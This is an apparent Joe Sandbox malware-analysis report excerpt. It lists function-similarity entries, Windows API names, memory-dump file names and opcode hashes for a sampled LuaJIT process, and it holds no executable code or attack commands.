                                                      • API ID: FreeLibrary
                                                      • String ID:
                                                      • API String ID: 3664257935-0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.2338138443.00007FF7B1DE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7B1DE0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_18_2_7ff7b1de0000_LuaJIT.jbxd
                                                      Similarity
                                                      • API ID: ErrorLast
                                                      • String ID:
                                                      • API String ID: 1452528299-0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.2338138443.00007FF7B1DE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7B1DE0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_18_2_7ff7b1de0000_LuaJIT.jbxd
                                                      Similarity
                                                      • API ID: strrchr
                                                      • String ID:
                                                      • API String ID: 3418686817-0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.2338138443.00007FF7B1DE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7B1DE0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_18_2_7ff7b1de0000_LuaJIT.jbxd
                                                      Similarity
                                                      • API ID: _free_nolock
                                                      • String ID:
                                                      • API String ID: 2882679554-0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.2338138443.00007FF7B1DE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7B1DE0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_18_2_7ff7b1de0000_LuaJIT.jbxd
                                                      Similarity
                                                      • API ID: _invalid_parameter_noinfo
                                                      • String ID:
                                                      • API String ID: 3215553584-0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.2338138443.00007FF7B1DE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7B1DE0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_18_2_7ff7b1de0000_LuaJIT.jbxd
                                                      Similarity
                                                      • API ID: _invalid_parameter_noinfo
                                                      • String ID:
                                                      • API String ID: 3215553584-0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.2338138443.00007FF7B1DE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7B1DE0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_18_2_7ff7b1de0000_LuaJIT.jbxd
                                                      Similarity
                                                      • API ID: _invalid_parameter_noinfo
                                                      • String ID:
                                                      • API String ID: 3215553584-0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.2338138443.00007FF7B1DE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7B1DE0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_18_2_7ff7b1de0000_LuaJIT.jbxd
                                                      Similarity
                                                      • API ID: HandleModule$AddressFreeLibraryProc
                                                      • String ID:
                                                      • API String ID: 3947729631-0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.2338138443.00007FF7B1DE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7B1DE0000, based on PE: true
                                                      • Associated: 00000012.00000002.2338049579.00007FF7B1DE0000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000012.00000002.2339030383.00007FF7B1ED1000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000012.00000002.2339165964.00007FF7B1EEF000.00000004.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000012.00000002.2339249256.00007FF7B1EF0000.00000008.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000012.00000002.2339332344.00007FF7B1EF2000.00000004.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000012.00000002.2339573022.00007FF7B1EF5000.00000002.00000001.01000000.00000005.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_18_2_7ff7b1de0000_LuaJIT.jbxd
                                                      Similarity
                                                      • API ID: _invalid_parameter_noinfo
                                                      • String ID:
                                                      • API String ID: 3215553584-0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.2338138443.00007FF7B1DE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7B1DE0000, based on PE: true
                                                      • Associated: 00000012.00000002.2338049579.00007FF7B1DE0000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000012.00000002.2339030383.00007FF7B1ED1000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000012.00000002.2339165964.00007FF7B1EEF000.00000004.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000012.00000002.2339249256.00007FF7B1EF0000.00000008.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000012.00000002.2339332344.00007FF7B1EF2000.00000004.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000012.00000002.2339573022.00007FF7B1EF5000.00000002.00000001.01000000.00000005.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_18_2_7ff7b1de0000_LuaJIT.jbxd
                                                      Similarity
                                                      • API ID: _invalid_parameter_noinfo
                                                      • String ID:
                                                      • API String ID: 3215553584-0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.2338138443.00007FF7B1DE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7B1DE0000, based on PE: true
                                                      • Associated: 00000012.00000002.2338049579.00007FF7B1DE0000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000012.00000002.2339030383.00007FF7B1ED1000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000012.00000002.2339165964.00007FF7B1EEF000.00000004.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000012.00000002.2339249256.00007FF7B1EF0000.00000008.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000012.00000002.2339332344.00007FF7B1EF2000.00000004.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000012.00000002.2339573022.00007FF7B1EF5000.00000002.00000001.01000000.00000005.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_18_2_7ff7b1de0000_LuaJIT.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.2338138443.00007FF7B1DE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7B1DE0000, based on PE: true
                                                      • Associated: 00000012.00000002.2338049579.00007FF7B1DE0000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000012.00000002.2339030383.00007FF7B1ED1000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000012.00000002.2339165964.00007FF7B1EEF000.00000004.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000012.00000002.2339249256.00007FF7B1EF0000.00000008.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000012.00000002.2339332344.00007FF7B1EF2000.00000004.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000012.00000002.2339573022.00007FF7B1EF5000.00000002.00000001.01000000.00000005.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_18_2_7ff7b1de0000_LuaJIT.jbxd
                                                      Similarity
                                                      • API ID: _invalid_parameter_noinfo
                                                      • String ID:
                                                      • API String ID: 3215553584-0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • RtlAllocateHeap.NTDLL(?,?,00000000,00007FF7B1EBAB79,?,?,?,00007FF7B1EAAF01,?,?,?,?,00007FF7B1EC02A3), ref: 00007FF7B1EB9271
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.2338138443.00007FF7B1DE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7B1DE0000, based on PE: true
                                                      • Associated: 00000012.00000002.2338049579.00007FF7B1DE0000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000012.00000002.2339030383.00007FF7B1ED1000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000012.00000002.2339165964.00007FF7B1EEF000.00000004.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000012.00000002.2339249256.00007FF7B1EF0000.00000008.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000012.00000002.2339332344.00007FF7B1EF2000.00000004.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000012.00000002.2339573022.00007FF7B1EF5000.00000002.00000001.01000000.00000005.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_18_2_7ff7b1de0000_LuaJIT.jbxd
                                                      Similarity
                                                      • API ID: AllocateHeap
                                                      • String ID:
                                                      • API String ID: 1279760036-0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.2338138443.00007FF7B1DE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7B1DE0000, based on PE: true
                                                      • Associated: 00000012.00000002.2338049579.00007FF7B1DE0000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000012.00000002.2339030383.00007FF7B1ED1000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000012.00000002.2339165964.00007FF7B1EEF000.00000004.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000012.00000002.2339249256.00007FF7B1EF0000.00000008.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000012.00000002.2339332344.00007FF7B1EF2000.00000004.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000012.00000002.2339573022.00007FF7B1EF5000.00000002.00000001.01000000.00000005.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_18_2_7ff7b1de0000_LuaJIT.jbxd
                                                      Similarity
                                                      • API ID: _fread_nolock_invalid_parameter_noinfo
                                                      • String ID:
                                                      • API String ID: 2335118202-0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.2338138443.00007FF7B1DE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7B1DE0000, based on PE: true
                                                      • Associated: 00000012.00000002.2338049579.00007FF7B1DE0000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000012.00000002.2339030383.00007FF7B1ED1000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000012.00000002.2339165964.00007FF7B1EEF000.00000004.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000012.00000002.2339249256.00007FF7B1EF0000.00000008.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000012.00000002.2339332344.00007FF7B1EF2000.00000004.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000012.00000002.2339573022.00007FF7B1EF5000.00000002.00000001.01000000.00000005.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_18_2_7ff7b1de0000_LuaJIT.jbxd
                                                      Similarity
                                                      • API ID: CreateMutex
                                                      • String ID:
                                                      • API String ID: 1964310414-0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.2338138443.00007FF7B1DE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7B1DE0000, based on PE: true
                                                      • Associated: 00000012.00000002.2338049579.00007FF7B1DE0000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000012.00000002.2339030383.00007FF7B1ED1000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000012.00000002.2339165964.00007FF7B1EEF000.00000004.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000012.00000002.2339249256.00007FF7B1EF0000.00000008.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000012.00000002.2339332344.00007FF7B1EF2000.00000004.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000012.00000002.2339573022.00007FF7B1EF5000.00000002.00000001.01000000.00000005.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_18_2_7ff7b1de0000_LuaJIT.jbxd
                                                      Similarity
                                                      • API ID: _invalid_parameter_noinfo
                                                      • String ID:
                                                      • API String ID: 3215553584-0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • RtlAllocateHeap.NTDLL(?,?,?,00007FF7B1EBBC42,?,?,?,00007FF7B1EAA3F4,?,?,?,00007FF7B1EAA3BA,?,?,?,00007FF7B1EAA541), ref: 00007FF7B1EBA2CE
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.2338138443.00007FF7B1DE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7B1DE0000, based on PE: true
                                                      • Associated: 00000012.00000002.2338049579.00007FF7B1DE0000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000012.00000002.2339030383.00007FF7B1ED1000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000012.00000002.2339165964.00007FF7B1EEF000.00000004.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000012.00000002.2339249256.00007FF7B1EF0000.00000008.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000012.00000002.2339332344.00007FF7B1EF2000.00000004.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000012.00000002.2339573022.00007FF7B1EF5000.00000002.00000001.01000000.00000005.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_18_2_7ff7b1de0000_LuaJIT.jbxd
                                                      Similarity
                                                      • API ID: AllocateHeap
                                                      • String ID:
                                                      • API String ID: 1279760036-0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • VirtualProtect.KERNELBASE(?,?,?,?,?,?,00007FF7B1E3AF20,?,?,?,?,00007FF7B1E3AABE), ref: 00007FF7B1E3AE07
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.2338138443.00007FF7B1DE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7B1DE0000, based on PE: true
                                                      • Associated: 00000012.00000002.2338049579.00007FF7B1DE0000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000012.00000002.2339030383.00007FF7B1ED1000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000012.00000002.2339165964.00007FF7B1EEF000.00000004.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000012.00000002.2339249256.00007FF7B1EF0000.00000008.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000012.00000002.2339332344.00007FF7B1EF2000.00000004.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000012.00000002.2339573022.00007FF7B1EF5000.00000002.00000001.01000000.00000005.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_18_2_7ff7b1de0000_LuaJIT.jbxd
                                                      Similarity
                                                      • API ID: ProtectVirtual
                                                      • String ID:
                                                      • API String ID: 544645111-0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.2338138443.00007FF7B1DE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7B1DE0000, based on PE: true
                                                      • Associated: 00000012.00000002.2338049579.00007FF7B1DE0000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000012.00000002.2339030383.00007FF7B1ED1000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000012.00000002.2339165964.00007FF7B1EEF000.00000004.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000012.00000002.2339249256.00007FF7B1EF0000.00000008.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000012.00000002.2339332344.00007FF7B1EF2000.00000004.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000012.00000002.2339573022.00007FF7B1EF5000.00000002.00000001.01000000.00000005.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_18_2_7ff7b1de0000_LuaJIT.jbxd
                                                      Similarity
                                                      • API ID: AllocVirtual
                                                      • String ID:
                                                      • API String ID: 4275171209-0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.2338138443.00007FF7B1DE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7B1DE0000, based on PE: true
                                                      • Associated: 00000012.00000002.2338049579.00007FF7B1DE0000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000012.00000002.2339030383.00007FF7B1ED1000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000012.00000002.2339165964.00007FF7B1EEF000.00000004.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000012.00000002.2339249256.00007FF7B1EF0000.00000008.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000012.00000002.2339332344.00007FF7B1EF2000.00000004.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000012.00000002.2339573022.00007FF7B1EF5000.00000002.00000001.01000000.00000005.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_18_2_7ff7b1de0000_LuaJIT.jbxd
                                                      Similarity
                                                      • API ID: FreeVirtual
                                                      • String ID:
                                                      • API String ID: 1263568516-0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                        • Part of subcall function 00007FF7B1EBA9A0: GetLastError.KERNEL32(?,?,?,00007FF7B1EBCEAA,?,?,?,?,?,?,?,?,FFFFFFFE,?,?,00007FF7B1EBCDA3), ref: 00007FF7B1EBA9AF
                                                        • Part of subcall function 00007FF7B1EBA9A0: SetLastError.KERNEL32(?,?,?,00007FF7B1EBCEAA,?,?,?,?,?,?,?,?,FFFFFFFE,?,?,00007FF7B1EBCDA3), ref: 00007FF7B1EBAA4D
                                                      • TranslateName.LIBCMT ref: 00007FF7B1ECA0A9
                                                      • TranslateName.LIBCMT ref: 00007FF7B1ECA0E4
                                                      • GetACP.KERNEL32(?,?,?,00000000,00000092,00007FF7B1EB717C), ref: 00007FF7B1ECA129
                                                      • IsValidCodePage.KERNEL32(?,?,?,00000000,00000092,00007FF7B1EB717C), ref: 00007FF7B1ECA151
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.2338138443.00007FF7B1DE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7B1DE0000, based on PE: true
                                                      • Associated: 00000012.00000002.2338049579.00007FF7B1DE0000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000012.00000002.2339030383.00007FF7B1ED1000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000012.00000002.2339165964.00007FF7B1EEF000.00000004.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000012.00000002.2339249256.00007FF7B1EF0000.00000008.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000012.00000002.2339332344.00007FF7B1EF2000.00000004.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000012.00000002.2339573022.00007FF7B1EF5000.00000002.00000001.01000000.00000005.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_18_2_7ff7b1de0000_LuaJIT.jbxd
                                                      Similarity
                                                      • API ID: ErrorLastNameTranslate$CodePageValid
                                                      • String ID: utf8
                                                      • API String ID: 2136749100-905460609
                                                      • Opcode ID: 255424f63280e3e9773fee599e4b3ae831039cf322cd8a585effd0c24e2c78c8
                                                      • Instruction ID: cde835adf85150f92b4fb667d0e1a0d415f69cb3429d23528dbc5481e1dfcbe3
                                                      • Opcode Fuzzy Hash: 255424f63280e3e9773fee599e4b3ae831039cf322cd8a585effd0c24e2c78c8
                                                      • Instruction Fuzzy Hash: D291C432A0875281EB24BF69D8402BDA395EBE6B89F844131DB5D4778DEFBDE541C320
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.2338138443.00007FF7B1DE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7B1DE0000, based on PE: true
                                                      • Associated: 00000012.00000002.2338049579.00007FF7B1DE0000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000012.00000002.2339030383.00007FF7B1ED1000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000012.00000002.2339165964.00007FF7B1EEF000.00000004.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000012.00000002.2339249256.00007FF7B1EF0000.00000008.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000012.00000002.2339332344.00007FF7B1EF2000.00000004.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000012.00000002.2339573022.00007FF7B1EF5000.00000002.00000001.01000000.00000005.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_18_2_7ff7b1de0000_LuaJIT.jbxd
                                                      Similarity
                                                      • API ID: Locale$CodeErrorInfoLastPageValid$DefaultEnumLocalesProcessSystemUser
                                                      • String ID:
                                                      • API String ID: 3939093798-0
                                                      • Opcode ID: c0147808cd7d225f435d5f31bfa55325a6945c6d109dcf6c359c79124503561a
                                                      • Instruction ID: 0f5973098350d1a1e337ca875a917969f1a954038280c4177840d9629f9e70f9
                                                      • Opcode Fuzzy Hash: c0147808cd7d225f435d5f31bfa55325a6945c6d109dcf6c359c79124503561a
                                                      • Instruction Fuzzy Hash: B1718F32F086028AFB14AB68D8506FDA3A1BFA674DF844535CF0D53689EFBCA444D360
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.2338138443.00007FF7B1DE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7B1DE0000, based on PE: true
                                                      • Associated: 00000012.00000002.2338049579.00007FF7B1DE0000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000012.00000002.2339030383.00007FF7B1ED1000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000012.00000002.2339165964.00007FF7B1EEF000.00000004.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000012.00000002.2339249256.00007FF7B1EF0000.00000008.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000012.00000002.2339332344.00007FF7B1EF2000.00000004.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000012.00000002.2339573022.00007FF7B1EF5000.00000002.00000001.01000000.00000005.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_18_2_7ff7b1de0000_LuaJIT.jbxd
                                                      Similarity
                                                      • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                      • String ID:
                                                      • API String ID: 3140674995-0
                                                      • Opcode ID: 4123f43c8803a46dbb8661f21826dece359977ba4a8d5ca7671b7c226e4b53b2
                                                      • Instruction ID: 49e2599125419568d82dc875b237032dc309817cedbfc0b257fdff65056c9fcd
                                                      • Opcode Fuzzy Hash: 4123f43c8803a46dbb8661f21826dece359977ba4a8d5ca7671b7c226e4b53b2
                                                      • Instruction Fuzzy Hash: 75316E72708BC186EB60AF64E8403EDB361FB95749F84443ADB4E47A98DF78C548C720
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.2338138443.00007FF7B1DE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7B1DE0000, based on PE: true
                                                      • Associated: 00000012.00000002.2338049579.00007FF7B1DE0000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000012.00000002.2339030383.00007FF7B1ED1000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000012.00000002.2339165964.00007FF7B1EEF000.00000004.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000012.00000002.2339249256.00007FF7B1EF0000.00000008.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000012.00000002.2339332344.00007FF7B1EF2000.00000004.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000012.00000002.2339573022.00007FF7B1EF5000.00000002.00000001.01000000.00000005.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_18_2_7ff7b1de0000_LuaJIT.jbxd
                                                      Similarity
                                                      • API ID: _get_daylight$_invalid_parameter_noinfo$InformationTimeZone
                                                      • String ID:
                                                      • API String ID: 435049134-0
                                                      • Opcode ID: f9bb82080360fa38c87216f357e5cc06e720d9d5a5b86dd3aaa06d23e79570f7
                                                      • Instruction ID: 615f732f2aa0c8d6dfeea40afa4482010224e3bf8543df42173b1fb74fc3f542
                                                      • Opcode Fuzzy Hash: f9bb82080360fa38c87216f357e5cc06e720d9d5a5b86dd3aaa06d23e79570f7
                                                      • Instruction Fuzzy Hash: 9EB1A226E0824345F710FF2D98815BAA760BBA6B89FC44135EF4D47A99DFBCE441C760
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.2338138443.00007FF7B1DE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7B1DE0000, based on PE: true
                                                      • Associated: 00000012.00000002.2338049579.00007FF7B1DE0000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000012.00000002.2339030383.00007FF7B1ED1000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000012.00000002.2339165964.00007FF7B1EEF000.00000004.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000012.00000002.2339249256.00007FF7B1EF0000.00000008.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000012.00000002.2339332344.00007FF7B1EF2000.00000004.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000012.00000002.2339573022.00007FF7B1EF5000.00000002.00000001.01000000.00000005.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_18_2_7ff7b1de0000_LuaJIT.jbxd
                                                      Similarity
                                                      • API ID: _get_daylight$_isindst$_invalid_parameter_noinfo
                                                      • String ID:
                                                      • API String ID: 1405656091-0
                                                      • Opcode ID: e62ff1e507688fec84e873f323350ed503463cf598c9097b0034628c948750c8
                                                      • Instruction ID: 7b1fc6f0cc8cf27db255ba87ae97667b03ec80e551f1e9d07a22027c4c288b93
                                                      • Opcode Fuzzy Hash: e62ff1e507688fec84e873f323350ed503463cf598c9097b0034628c948750c8
                                                      • Instruction Fuzzy Hash: 6391C5B2B0424747EB58DF2DC981279A295EB6578DF848139EB0E4A78DEE7CE441C720
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.2338138443.00007FF7B1DE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7B1DE0000, based on PE: true
                                                      • Associated: 00000012.00000002.2338049579.00007FF7B1DE0000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000012.00000002.2339030383.00007FF7B1ED1000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000012.00000002.2339165964.00007FF7B1EEF000.00000004.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000012.00000002.2339249256.00007FF7B1EF0000.00000008.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000012.00000002.2339332344.00007FF7B1EF2000.00000004.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000012.00000002.2339573022.00007FF7B1EF5000.00000002.00000001.01000000.00000005.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_18_2_7ff7b1de0000_LuaJIT.jbxd
                                                      Similarity
                                                      • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                      • String ID:
                                                      • API String ID: 1239891234-0
                                                      • Opcode ID: 440864b89a776c0cdd248b829cf902a0f2986e84d5b3976af7ea4912e32b40c1
                                                      • Instruction ID: 45bf8df7b5f4db2bd3f2e938286542cf88b1cded1c072ea138413a71e42a7e75
                                                      • Opcode Fuzzy Hash: 440864b89a776c0cdd248b829cf902a0f2986e84d5b3976af7ea4912e32b40c1
                                                      • Instruction Fuzzy Hash: F9319432608B8186DB60EF29E8447AEB3A4FB99799F940135EB8D43B58DF7CC145CB10
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.2338138443.00007FF7B1DE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7B1DE0000, based on PE: true
                                                      • Associated: 00000012.00000002.2338049579.00007FF7B1DE0000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000012.00000002.2339030383.00007FF7B1ED1000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000012.00000002.2339165964.00007FF7B1EEF000.00000004.00000001.01000000.00000005.sdmp
